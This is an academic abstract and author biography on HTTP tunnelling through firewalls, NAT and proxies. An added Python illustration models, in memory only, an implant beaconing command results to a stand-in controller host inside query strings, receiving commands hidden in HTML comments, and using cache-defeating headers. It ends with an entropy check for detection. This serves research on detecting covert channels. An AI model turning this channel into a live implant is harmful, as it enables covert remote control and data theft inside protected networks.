Enterprise Network Vulnerability to HTTP Tunnelling
Dr. Scott Knight
ABSTRACT
It has been understood for some time that arbitrary data, including the
communications associated with malicious backdoors and Trojan horses, can
be tunnelled by subverting the HTTP protocol. Although there are a
number of demonstration programs openly available, the risks associated
with this vulnerability have not been characterised in the literature.
This research investigates the nature of the vulnerability and the
efficacy of contemporary network defence strategies such as firewall
technology, intrusion detection systems, HTTP caching and proxying, and
network address translation. All of these techniques are easily
circumvented by HTTP tunnelling strategies, because the tunnel's connections
are initiated from inside the protected network and pass stateful firewalls
and NAT as ordinary outbound web sessions. Web traffic also forms a large
portion of the traffic crossing network boundaries, which makes the HTTP
protocol an attractive target for subversion. This research explores
techniques that may be used to hide malicious traffic in what appears to be
legitimate HTTP traffic originating from within the protected network. Such a
covert channel can give a machine anywhere on the Internet external control
of a computer on the protected network. The
techniques explored by this project are used in parallel research
projects to detect such malicious tunnel traffic and validate new
intrusion detection technology.
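The exchange the abstract describes, shown as an added illustration that is not part of the paper and not the author's tunnelling programs: an implant inside the protected network sends an ordinary-looking outbound GET whose query string carries tunnelled data, and the controller answers with a valid 200 OK HTML page whose comment carries the next command. The controller name, paths, parameter names and sample payloads are constructed for the example; everything runs in memory with no sockets opened. A per-request nonce and Cache-Control headers show the detail that lets such a tunnel pass a caching proxy, and a small entropy check shows one way a query string of encoded data differs from a real search term.

```python
"""
Constructed in-memory model of an HTTP covert channel. Both sides' messages
are built and parsed here; nothing touches the network.
"""
import base64
import math
import re
import secrets
from collections import Counter

CONTROLLER_HOST = "www.example.com"  # hypothetical controller name (assumption)


def b64u(data):
    """URL-safe base64 without padding, so the payload fits in a query string."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64u_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def build_beacon(host_id, result):
    """Implant side: wrap a command result in an outbound GET. The nonce and
    Cache-Control: no-cache keep a caching proxy from answering the request
    itself with a stale copy of an earlier controller reply."""
    nonce = secrets.token_hex(4)
    path = "/search?q=%s&sid=%s&n=%s" % (b64u(result), host_id, nonce)
    return (
        "GET %s HTTP/1.1\r\n"
        "Host: %s\r\n"
        "User-Agent: Mozilla/5.0 (compatible)\r\n"
        "Cache-Control: no-cache\r\n"
        "Connection: close\r\n\r\n" % (path, CONTROLLER_HOST)
    ).encode()


def read_beacon(request):
    """Controller side: recover the host id and the tunnelled result."""
    request_line = request.split(b"\r\n", 1)[0].decode()
    m = re.match(
        r"GET /search\?q=([A-Za-z0-9_-]*)&sid=([^&]+)&n=\w+ HTTP/1\.1$",
        request_line,
    )
    if not m:
        raise ValueError("not a beacon")
    return m.group(2), b64u_decode(m.group(1))


def build_reply(command):
    """Controller side: a well-formed 200 OK whose HTML comment carries the
    next command; a browser would render an empty results page."""
    body = (
        "<html><head><title>Search</title></head><body>"
        "<!-- %s --><p>No results.</p></body></html>" % b64u(command)
    ).encode()
    head = (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html\r\n"
        "Cache-Control: no-store\r\n"
        "Content-Length: %d\r\n\r\n" % len(body)
    ).encode()
    return head + body


def read_reply(response):
    """Implant side: pull the command back out of the HTML comment."""
    head, _, body = response.partition(b"\r\n\r\n")
    if not head.startswith(b"HTTP/1.1 200"):
        raise ValueError("unexpected status")
    m = re.search(rb"<!-- ([A-Za-z0-9_-]*) -->", body)
    return b64u_decode(m.group(1).decode()) if m else b""


def exchange(host_id, result, command):
    """One round trip: implant beacons with a result, controller answers
    with the next command. Returns what each side recovered."""
    seen_id, seen_result = read_beacon(build_beacon(host_id, result))
    return seen_id, seen_result, read_reply(build_reply(command))


def shannon_entropy(text):
    """Bits per character. Encoded payloads score well above natural-language
    search terms; an illustrative heuristic, not a detector."""
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values()) if n else 0.0


def query_value_entropy(request):
    """Entropy of the q= parameter of a beacon, as a proxy or IDS could compute it."""
    request_line = request.split(b"\r\n", 1)[0].decode()
    m = re.search(r"[?&]q=([^& ]*)", request_line)
    return shannon_entropy(m.group(1)) if m else 0.0
```

The request and response above are syntactically valid HTTP, which is the point: a packet filter sees an outbound connection to port 80, a stateless proxy sees a cacheable-looking GET that the headers tell it not to cache, and NAT sees a session opened from inside. Only the content of the query string and the comment betray the tunnel, and a simple entropy measure on those fields is one place a detector can start.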
BIOGRAPHY
Scott Knight is an Assistant Professor in the Department of Electrical
and Computer Engineering at the Royal Military College of Canada. Dr
Knight has worked with the National Defence Intelligence and Security
communities on the development of secure computing networks. He founded
the Computer Security Laboratory at RMC, a research group he continues to
lead. This research group has a close working relationship
with the Canadian Forces Information Operations Group and focuses on
computer network defence and support to information operations.